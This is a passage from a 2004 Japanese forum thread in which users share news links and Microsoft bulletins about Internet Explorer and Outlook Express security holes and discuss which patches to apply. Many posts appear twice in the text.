761 :名無しさん@お腹いっぱい。:04/08/20 13:03
IEにセキュリティ・ホール,危険なファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040819/148790/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040819/148790/
762 :名無しさん@お腹いっぱい。:04/08/24 15:08
リンク先を偽装する“偽シティバンク”からのメールに注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040823/148888/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040823/148888/
763 :名無しさん@お腹いっぱい。:04/08/26 12:54
Outlook Expressに「BCC」のアドレスを表示してしまう不具合
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/
764 :名無しさん@お腹いっぱい。:04/08/27 01:00
IEのドラッグ&ドロップの脆弱性突いた攻撃が公に?
http://www.itmedia.co.jp/enterprise/articles/0408/26/news075.html?ec20
http://www.itmedia.co.jp/enterprise/articles/0408/26/news075.html?ec20
765 :名無しさん@お腹いっぱい。:04/09/02 23:44
緊急報告!Windows XP SP2の全貌(第3回)
Internet Explorer/Outlook Express編
http://itpro.nikkeibp.co.jp/members/NT/WinSpecial/20040901/1/
>IEではActiveXコントロールのインストールやスクリプトによるファイルの
>自動ダウンロードなど,5つの事項について警告メッセージを表示するよう
>になっている。OEではHTMLメールの中の外部と張られたリンクなどは,むや
>みに読み込まないようになった。
Internet Explorer/Outlook Express編
http://itpro.nikkeibp.co.jp/members/NT/WinSpecial/20040901/1/
>IEではActiveXコントロールのインストールやスクリプトによるファイルの
>自動ダウンロードなど,5つの事項について警告メッセージを表示するよう
>になっている。OEではHTMLメールの中の外部と張られたリンクなどは,むや
>みに読み込まないようになった。
766 :名無しさん@お腹いっぱい。:04/09/05 00:08
IEのドラッグ&ドロップの脆弱性を突くトロイの木馬「Akak」出現
http://www.itmedia.co.jp/enterprise/articles/0409/04/news002.html
http://www.itmedia.co.jp/enterprise/articles/0409/04/news002.html
767 :MS04-028:04/09/15 09:10:36
===緊急===
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596
概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596
概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。
768 :名無しさん@お腹いっぱい。:04/09/15 10:52:02
XPのSP1だけど、Windows Updateサイトで確認してもMS04-028は出ません。
.NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて
もいいんだろうか?
とりあえずしばらくは関連情報に注目しときます。
.NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて
もいいんだろうか?
とりあえずしばらくは関連情報に注目しときます。
769 :名無しさん@お腹いっぱい。:04/09/15 11:55:38
WindowsやIE,Officeなど複数のマイクロソフト製品に「緊急」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/
Microsoft Officeにセキュリティ・ホール,WordPerfect文書でバッファ・オーバーフローの危険性
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149927/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/
Microsoft Officeにセキュリティ・ホール,WordPerfect文書でバッファ・オーバーフローの危険性
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149927/
770 :名無しさん@お腹いっぱい。:04/09/22 10:36:53
IEやMozillaなどにセキュリティ・ホール,なりすましを許す可能性あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040921/150222/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040921/150222/
771 :名無しさん@お腹いっぱい。:04/09/25 22:57:30
WindowsやIEなどのセキュリティホールを突くさらに危険なJPEGファイルが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040924/150333/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040924/150333/
772 :名無しさん@お腹いっぱい。:04/09/29 14:16:26
セキュリティ・ホールを突くJPEGファイルの“作成ツール”が出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040928/150524/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040928/150524/
773 :名無しさん@お腹いっぱい。:04/09/30 09:37:07
危険な“JPEGウイルス”出現間近,備えは万全ですか?
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20040929/150576/
JPEG処理の脆弱性悪用画像、今度はAIMのプロフィールに
http://www.itmedia.co.jp/enterprise/articles/0409/30/news007.html
WindowsのJPEG処理脆弱性が、さらなる広がりを見せている。
AIMのプロフィールに問題の画像を添付するという手口が登場した模様だ。
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20040929/150576/
JPEG処理の脆弱性悪用画像、今度はAIMのプロフィールに
http://www.itmedia.co.jp/enterprise/articles/0409/30/news007.html
WindowsのJPEG処理脆弱性が、さらなる広がりを見せている。
AIMのプロフィールに問題の画像を添付するという手口が登場した模様だ。
初心者で申し訳ないのですが、質問させてください。
OEを使っているのですが、気付いたらアカウントの設定
(”サーバー”タブ内のSMTP欄)がいつのまにかlocal hostに変わっていました。
前はISPのSMTPサーバー名を入れてあったのに・・・。
これってどうしてでしょうか?
OEを使っているのですが、気付いたらアカウントの設定
(”サーバー”タブ内のSMTP欄)がいつのまにかlocal hostに変わっていました。
前はISPのSMTPサーバー名を入れてあったのに・・・。
これってどうしてでしょうか?
775 :名無しさん@お腹いっぱい。:04/09/30 10:53:13
アンチウィルスソフトがメーラーを監視するためにlocalhostにして
中継している場合もあるよ。
中継している場合もあるよ。
776 :名無しさん@お腹いっぱい。:04/09/30 13:30:40
777 :名無しさん@お腹いっぱい。:04/09/30 14:30:34
777get!!
778 :名無しさん@お腹いっぱい。:04/10/05 09:09:23
IEでパスワードを含めたURLを使うと,ベーシック認証に失敗にする場合あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041004/150753/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041004/150753/
779 :名無しさん@お腹いっぱい。:04/10/05 15:13:05
広がるJPEG GDI+攻撃についての続報
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041004/3/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041004/3/
780 :名無しさん@お腹いっぱい。:04/10/13 08:54:26
===緊急===
MS04-038 - Internet Explorer 用の累積的なセキュリティ更新プログラム
(834707)
http://go.microsoft.com/?linkid=1187917
MS04-038 - Internet Explorer 用の累積的なセキュリティ更新プログラム
(834707)
http://go.microsoft.com/?linkid=1187917
781 :名無しさん@お腹いっぱい。:04/10/14 18:55:38
MS04-038 を適用して何か不具合出た方いらっしゃいます?
調べた限りでは
http://support.microsoft.com/default.aspx?scid=kb;ja;888051
以外に特に問題はなさそうなのですが…
調べた限りでは
http://support.microsoft.com/default.aspx?scid=kb;ja;888051
以外に特に問題はなさそうなのですが…
782 :名無しさん@お腹いっぱい。:04/10/15 15:21:57
MS04-038は、なさそうだね。
783 :名無しさん@お腹いっぱい。:04/10/22 13:19:04
IEに2種類のセキュリティ・ホール,組み合わせるとXP SP2も影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041021/151548/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041021/151548/
784 :名無しさん@お腹いっぱい。:04/10/27 23:59:12
10月のセキュリティ・ホール,その後
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20041027/151822/
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20041027/151822/
785 :名無しさん@お腹いっぱい。:04/10/29 14:38:15
IE 6.0 SP1 において URL を詐称するリンクが作成可能だ、という指摘。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/10.html#20041029_URL
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.10/msg00345.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/10.html#20041029_URL
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.10/msg00345.html
786 :名無しさん@お腹いっぱい。:04/11/01 00:35:29
開発者のプライドか、それとも「脆弱性」のネガティブイメージの影響か
ttp://d.hatena.ne.jp/HiromitsuTakagi/20041030#p1
ttp://d.hatena.ne.jp/HiromitsuTakagi/20041030#p1
787 :名無しさん@お腹いっぱい。:04/11/02 13:30:08
IEのステータス・バーを偽装する手法が複数公開される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041101/152016/
>米国時間10月28日以降,セキュリティ関連のメーリング・リストなどで,
>Internet Explorer(IE)のステータス・バーを偽装する手法(セキュ
>リティ・ホール)が複数公開されて議論を呼んだ。アクティブスクリプ
>トを無効にしていても偽装可能なので,IEを「制限付きサイト」ゾーン
>で利用するOutlook ExpressやOutlookといったメール・ソフトも影響
>を受ける。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041101/152016/
>米国時間10月28日以降,セキュリティ関連のメーリング・リストなどで,
>Internet Explorer(IE)のステータス・バーを偽装する手法(セキュ
>リティ・ホール)が複数公開されて議論を呼んだ。アクティブスクリプ
>トを無効にしていても偽装可能なので,IEを「制限付きサイト」ゾーン
>で利用するOutlook ExpressやOutlookといったメール・ソフトも影響
>を受ける。
788 :名無しさん@お腹いっぱい。:04/11/02 13:46:46
次から次へと穴が見つかるのは何故?
1.シェアが高くて注目されてるから
2.もともと設計が糞だから
3.…
他のOS用のIE6SP2もリリースすべきヽ(`Д´)ノ
1.シェアが高くて注目されてるから
2.もともと設計が糞だから
3.…
他のOS用のIE6SP2もリリースすべきヽ(`Д´)ノ
789 :名無しさん@お腹いっぱい。:04/11/02 18:59:00
>>787
このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。
このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。
790 :名無しさん@お腹いっぱい。:04/11/02 23:23:33
みんながセキュリティソフト入れてれば、ね。
791 :名無しさん@お腹いっぱい。:04/11/03 20:15:28
>>786
利用規約違反中ってなってる・・・
利用規約違反中ってなってる・・・
792 :名無しさん@お腹いっぱい。:04/11/04 11:42:59
793 :名無しさん@お腹いっぱい。:04/11/04 12:06:07
偽ってというか、
あんなサービスに正しい個人情報差し出す奴いるのか?
しかしいきなり消すかねえ。
有名サイトなので目をつけられたのか、あからさまに偽と確定できる
住所(「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない
やつ)で登録してたからか。
あんなサービスに正しい個人情報差し出す奴いるのか?
しかしいきなり消すかねえ。
有名サイトなので目をつけられたのか、あからさまに偽と確定できる
住所(「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない
やつ)で登録してたからか。
794 :名無しさん@お腹いっぱい。:04/11/04 12:23:00
はてな登録情報の住所追加、正しい情報登録のお願いについて
http://www.hatena.ne.jp/info/address
http://www.hatena.ne.jp/info/address
795 :名無しさん@お腹いっぱい。:04/11/04 12:49:03
> 住所をご登録頂いていないユーザー様には、登録情報変更ページに
> て住所をご登録いただくまで、はてなをご利用頂けなくなります
ああ、登録してなかったんだな。たぶん。
そうまでして個人情報吸い上げようとするか。
何か新しい商売はじめるのかね。
> て住所をご登録いただくまで、はてなをご利用頂けなくなります
ああ、登録してなかったんだな。たぶん。
そうまでして個人情報吸い上げようとするか。
何か新しい商売はじめるのかね。
796 :名無しさん@お腹いっぱい。:04/11/04 13:24:56
>>795
それは来年1月からだろう。
いま見られなくなってるのはTakagiタンが自粛してプライベートモードにしてるだけだと思われ。
あのやり方だと氏名・住所の正確性は担保されないから、
>他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。
それは来年1月からだろう。
いま見られなくなってるのはTakagiタンが自粛してプライベートモードにしてるだけだと思われ。
あのやり方だと氏名・住所の正確性は担保されないから、
>他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。
797 :名無しさん@お腹いっぱい。:04/11/05 10:39:33
IEに新たなセキュリティ・ホール,WebページやHTMLメールを開くだけで被害を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/
>デンマークSecuniaなどは11月2日,Internet Explorer(IE)6/6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>(WebページやHTMLメール)を開くだけで,任意のプログラムを実行させ
>られる危険性がある。実際,セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず,IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお,Windows XP SP2を適用して
>いる場合には影響を受けない。(ry
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/
>デンマークSecuniaなどは11月2日,Internet Explorer(IE)6/6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>(WebページやHTMLメール)を開くだけで,任意のプログラムを実行させ
>られる危険性がある。実際,セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず,IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお,Windows XP SP2を適用して
>いる場合には影響を受けない。(ry
798 :名無しさん@お腹いっぱい。:04/11/05 11:06:17
ホント他のOS用にもIE6SP2出してほしいよ
仕方がないから会社のWin2kでのWebブラウズは
当面Firefox使うことにした
仕方がないから会社のWin2kでのWebブラウズは
当面Firefox使うことにした
799 :名無しさん@お腹いっぱい。:04/11/05 13:39:52
IE6SP2(2K,ME,98用)激しくキボンヌ
800 :名無しさん@お腹いっぱい。:04/11/05 13:41:30
NT用モナー
801 :名無しさん@お腹いっぱい。:04/11/05 16:02:02
サード・パーティ製品で強化する「ブラウザ・セキュリティ」
http://itpro.nikkeibp.co.jp/members/NT/WinSecurity/20041025/1/
>MicrosoftはIEの新版を,単独のソフトウエアとして提供しないと決めた。
>その理由は,同社がIEをOSの不可分な要素と考えているからである。最新
>のWindows XP Service Pack 2(SP2)では,OSの基礎となるセキュリティ
>やIEなど,様々な構成要素に改良を加えた。Microsoftは,Windows 2000
>とそれ以前のOSに対して,同様の改良品を提供する計画はない。
http://itpro.nikkeibp.co.jp/members/NT/WinSecurity/20041025/1/
>MicrosoftはIEの新版を,単独のソフトウエアとして提供しないと決めた。
>その理由は,同社がIEをOSの不可分な要素と考えているからである。最新
>のWindows XP Service Pack 2(SP2)では,OSの基礎となるセキュリティ
>やIEなど,様々な構成要素に改良を加えた。Microsoftは,Windows 2000
>とそれ以前のOSに対して,同様の改良品を提供する計画はない。
802 :名無しさん@お腹いっぱい。:04/11/05 18:50:55
>801
日経はトラッキングクッキー拒否にしているから見られないや まあいいか
日経はトラッキングクッキー拒否にしているから見られないや まあいいか
803 :名無しさん@お腹いっぱい。:04/11/05 23:30:14
>>802
/members/のページは、メンバー登録(無料)とcookieの両方必要。
/members/のページは、メンバー登録(無料)とcookieの両方必要。
804 :名無しさん@お腹いっぱい。:04/11/08 11:22:20
Internet Explorer のセキュリティ上の問題 "クリックとスクロール" からコンピュータを保護する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;888534
http://support.microsoft.com/default.aspx?scid=kb;ja;888534
805 :名無しさん@お腹いっぱい。:04/11/10 09:11:23
IEのパッチ未公開セキュリティ・ホールを突くウイルスが出現
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041109/152325/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041109/152325/
806 :わたしだけ?(だなw):04/11/10 15:53:45
http://www.microsoft.com/japan/technet/security/bulletin/MS04-038.asp
>影響を受けるコンポーネント :
(ry
>Windows XP Service Pack 2 上の Internet Explorer 6
はWinXP-SP2上のIE=IE6-SP2ってことなんだよな
今まで何でわからなかったんだよw>漏れ & 注意つけとけよw>MS
最初読んだ時無印IE6のことだと思っちまったじゃねーかw
漏れはOS違うから↑は関係ないんだけど、やっぱり確認用にWiindowsUpdate(or MBSA)する習慣はつけとかないとダメか・・・
ところでセキュリティサイト・ホームからリンクたどっていっても↓にたどりつけないのも漏れだけ?
http://www.microsoft.com/japan/technet/security/fixedhome.asp?TFrame=false
>影響を受けるコンポーネント :
(ry
>Windows XP Service Pack 2 上の Internet Explorer 6
はWinXP-SP2上のIE=IE6-SP2ってことなんだよな
今まで何でわからなかったんだよw>漏れ & 注意つけとけよw>MS
最初読んだ時無印IE6のことだと思っちまったじゃねーかw
漏れはOS違うから↑は関係ないんだけど、やっぱり確認用にWiindowsUpdate(or MBSA)する習慣はつけとかないとダメか・・・
ところでセキュリティサイト・ホームからリンクたどっていっても↓にたどりつけないのも漏れだけ?
http://www.microsoft.com/japan/technet/security/fixedhome.asp?TFrame=false
807 :名無しさん@お腹いっぱい。:04/11/10 16:14:45
IEのIFrame欠陥を悪用する2番目のMyDoomが出現
http://www.itmedia.co.jp/enterprise/articles/0411/10/news038.html
>>806
リンクからはみつからないね。
「製品別更新プログラム一覧」でサイト内検索すると見つかるけど。
http://www.itmedia.co.jp/enterprise/articles/0411/10/news038.html
>>806
リンクからはみつからないね。
「製品別更新プログラム一覧」でサイト内検索すると見つかるけど。
808 :名無しさん@お腹いっぱい。:04/11/11 09:30:08
“巧妙な”フィッシングが出現,ポップアップでアドレス・バーを偽装
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041110/152412/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041110/152412/
809 :名無しさん@お腹いっぱい。:04/11/17 17:28:20
IE次期版はLonghornと一緒に出荷,タブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041117/3/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041117/3/
810 :名無しさん@お腹いっぱい。:04/11/19 20:36:39
Microsoft Internet Explorer Two Vulnerabilities
http://secunia.com/advisories/13203/
http://secunia.com/advisories/13203/
811 :名無しさん@お腹いっぱい。:04/11/27 10:51:02
SP2適用のIE6に画像ダウンロード詐称の脆弱性
http://www.itmedia.co.jp/enterprise/articles/0411/27/news004.html
http://www.itmedia.co.jp/enterprise/articles/0411/27/news004.html
812 :名無しさん@お腹いっぱい。:04/11/27 19:47:56
813 :名無しさん@お腹いっぱい。:04/11/28 20:49:17
マイクロソフト、IE6の「Mshtml.dll」エラーに対する修正プログラムを配布
http://internet.watch.impress.co.jp/cda/news/2004/11/26/5550.html
http://internet.watch.impress.co.jp/cda/news/2004/11/26/5550.html
814 :MS04-040緊急:04/12/02 07:04:56
===緊急===
MS04-040 - Internet Explorer 用の累積的なセキュリティ更新プログラム (889293)
http://go.microsoft.com/?linkid=1576712
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
MS04-040 - Internet Explorer 用の累積的なセキュリティ更新プログラム (889293)
http://go.microsoft.com/?linkid=1576712
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
815 :名無しさん@お腹いっぱい。:04/12/02 07:22:37
816 :名無しさん@お腹いっぱい。:04/12/02 13:36:40
>>814-815
>重要 : この累積的な更新プログラムは、マイクロソフト セキュリティ情報
>MS04-004http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
>または MS04-038http://www.microsoft.com/japan/technet/security/bulletin/ms04-038.asp
>のリリース以来、リリースされた修正プログラムを含まない場合もあります。
>MS04-004 または MS04-038 のリリース以来、マイクロソフトからまたはサポート プロバイダ
>から修正プログラムを受けたお客様は、この更新プログラムをインストールしないで下さい。
>この累積的な更新プログラムではなく、更新プログラム 889669
>http://www.microsoft.com/isapi/gosupport.asp?TARGET=/default.aspx?scid=kb;ja;889669
>を適用して下さい。
MS04-004 または MS04-038 のリリース以来修正プログラムを受けてなくても、
更新プログラム 889669を適用すれば( ゚Д゚)ウマーなのかな?
>重要 : この累積的な更新プログラムは、マイクロソフト セキュリティ情報
>MS04-004http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
>または MS04-038http://www.microsoft.com/japan/technet/security/bulletin/ms04-038.asp
>のリリース以来、リリースされた修正プログラムを含まない場合もあります。
>MS04-004 または MS04-038 のリリース以来、マイクロソフトからまたはサポート プロバイダ
>から修正プログラムを受けたお客様は、この更新プログラムをインストールしないで下さい。
>この累積的な更新プログラムではなく、更新プログラム 889669
>http://www.microsoft.com/isapi/gosupport.asp?TARGET=/default.aspx?scid=kb;ja;889669
>を適用して下さい。
MS04-004 または MS04-038 のリリース以来修正プログラムを受けてなくても、
更新プログラム 889669を適用すれば( ゚Д゚)ウマーなのかな?
817 :名無しさん@お腹いっぱい。:04/12/02 18:18:08
>>816
889669はMS04-040を含むロールアップだからいいんじゃない?
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c74028e2-10c9-4edd-ad0a-36493677bff8
http://www.microsoft.com/japan/technet/security/bulletin/fq04-040.asp
>MS04-004 以降にリリースされた Internet Explorer 用の修正プログラムは、その修正プログラムにより置き換えられるファイルが
>このセキュリティ情報の「セキュリティ更新プログラムに関する情報」の欄に記載されている場合、削除されます。
(「累積的なセキュリティ更新プログラム」なんだから↑の「修正プログラム」はセキュリティ修正以外ということでいいんだよね?>ALL)
しかし889293はかなり前のDLLソースにパッチ当てたおかん
889669はMS04-040を含むロールアップだからいいんじゃない?
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c74028e2-10c9-4edd-ad0a-36493677bff8
http://www.microsoft.com/japan/technet/security/bulletin/fq04-040.asp
>MS04-004 以降にリリースされた Internet Explorer 用の修正プログラムは、その修正プログラムにより置き換えられるファイルが
>このセキュリティ情報の「セキュリティ更新プログラムに関する情報」の欄に記載されている場合、削除されます。
(「累積的なセキュリティ更新プログラム」なんだから↑の「修正プログラム」はセキュリティ修正以外ということでいいんだよね?>ALL)
しかし889293はかなり前のDLLソースにパッチ当てたおかん
ていうか889669じゃないとセキュリティ修正以外のパッチでもトラブル覚悟ですぐ当てるタイプの人には不足(889293でも穴はふさがるけど)
>更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。
>更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。
819 :816:04/12/02 19:07:20
820 :名無しさん@お腹いっぱい。:04/12/02 19:21:01
IEのパッチが“緊急公開”,既に悪用されている危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041202/153376/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041202/153376/
821 :名無しさん@お腹いっぱい。:04/12/07 21:57:48
>>816-818
IE のセキュリティ アップデート MS04-040 (KB889293) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000291.html
IE のセキュリティ アップデート MS04-040 (KB889293) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000291.html
822 :名無しさん@お腹いっぱい。:04/12/08 07:35:16
もう訳わからん。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。
で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題?
俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。
from
SUZUKI kenji <[email protected]>
を
鈴木賢治 <[email protected]>
にして欲しいらしい。
ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。
で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題?
俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。
from
SUZUKI kenji <[email protected]>
を
鈴木賢治 <[email protected]>
にして欲しいらしい。
ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。
823 :名無しさん@お腹いっぱい。:04/12/08 07:50:46
無問題なんて言い切れるのは神様かただの莫迦だよ
だってMSだもの
みつを
だってMSだもの
みつを
824 :名無しさん@お腹いっぱい。:04/12/08 10:55:00
>>822
無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。
そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…
無問題といいきれないが、少なくともテキスト表示にして
標準のブラウザをIE(コンポーネント使用ブラウザ含む)以外のブラウザ(FireFoxとかOperaとか)にしておけば、
かなりリスクは低減できると思う(さらにJavaScriptも無効に)。
そこまでしてOE使うなという意見もあるけど、いろんな事情で使わざるを得ない人もいるだろうから…
825 :名無しさん@お腹いっぱい。:04/12/08 11:54:36
OE 使うのはやめとけ
SP2パッチあててFirefox (Javaスクリプト無効) 導入汁
ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定
ルーターは2重で完璧!!(要:ポート設定)
アンチウイルスソフトはノートンかKasperskyA-V導入
これだけで9割不正アクセス&ウイルスに対して有効
SP2パッチあててFirefox (Javaスクリプト無効) 導入汁
ファイアーウオールはKerio personal ファイアーウオールでMAXセキュに設定
ルーターは2重で完璧!!(要:ポート設定)
アンチウイルスソフトはノートンかKasperskyA-V導入
これだけで9割不正アクセス&ウイルスに対して有効
826 :名無しさん@お腹いっぱい。:04/12/08 14:43:54
やっぱコンポーネントの問題は逃れられないのか。
んで、さっきIE6を
アンインストール→インストールし直し
したんだけど、
Windows Updateで、なぜか823559だけ何度も表示される。
適用したはずなのに、再起動してもう一度行くとまた表示される。
パッチをダウンロードして保存してから実行してもダメ。
まぁこんなこともよくあるのでしょう・・・が、
ちょっと不安なので、バージョン合ってるか見て下さい。
Ver.6.0.2800.1106
更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829
(最後のだけなぜかQが小文字)
関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。
そもそもなぜ出来ないようにしてあるのだろうか。
んで、さっきIE6を
アンインストール→インストールし直し
したんだけど、
Windows Updateで、なぜか823559だけ何度も表示される。
適用したはずなのに、再起動してもう一度行くとまた表示される。
パッチをダウンロードして保存してから実行してもダメ。
まぁこんなこともよくあるのでしょう・・・が、
ちょっと不安なので、バージョン合ってるか見て下さい。
Ver.6.0.2800.1106
更新バージョン ; SP1 ; Q889293 ; Q837009 ; q313829
(最後のだけなぜかQが小文字)
関係ないけどこのバージョン情報って何とかコピペ出来ないんだろうか。
そもそもなぜ出来ないようにしてあるのだろうか。
書き忘れ
OSは98seです。
OSは98seです。
828 :名無しさん@お腹いっぱい。:04/12/08 15:22:20
>>825
ソフトよりユーザーの知識や意識の方が大事
ソフトよりユーザーの知識や意識の方が大事
829 : ◆DrP5COAzdc :04/12/08 16:06:11
>>826
このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート>プログラム>アクセサリ>システムツール>システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)
バージョン 6.0.2800.1106IS
ビルド 62800.1106
プロダクト ID *****-***-*******-*****
アプリケーションのパス C:\Program Files\Internet Explorer
最終インストールの日付 16/07/24 15:56:35
言語 日本語
アクティブなプリンタ Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
暗号強度 128 ビット
コンテンツ アドバイザ 無効
更新バージョン ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン 5.0.3810.0
IEAK インストール する
IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
というのが、「アプリケーションの追加と削除」にリストアップされています。
これは、システム情報の W98.SE の所でも見られます。
ちなみに、IE5→5.5→6とバージョンアップしてきて、IEをアンインストールしたことはありません。
このスレは初めてですが、同じ環境なので取り敢えず参考程度になれば・・・
スタート>プログラム>アクセサリ>システムツール>システム情報
のInternet Explorerを見ると、以下のようになっています。(コピーも出来ます)
バージョン 6.0.2800.1106IS
ビルド 62800.1106
プロダクト ID *****-***-*******-*****
アプリケーションのパス C:\Program Files\Internet Explorer
最終インストールの日付 16/07/24 15:56:35
言語 日本語
アクティブなプリンタ Kyocera Mita KM-2070 KX,KM163097,***.***.*.*:lp
暗号強度 128 ビット
コンテンツ アドバイザ 無効
更新バージョン ;SP1;q313829;Q822925;Q828750;Q824145;Q832894;Q837009;Q831167;Q823353;Q867801;Q833989;Q834707;Q889293;
Java VM バージョン 5.0.3810.0
IEAK インストール する
IEの更新バージョンに 823559 は見あたりませんが、「Windows Q823559 のアップデート」
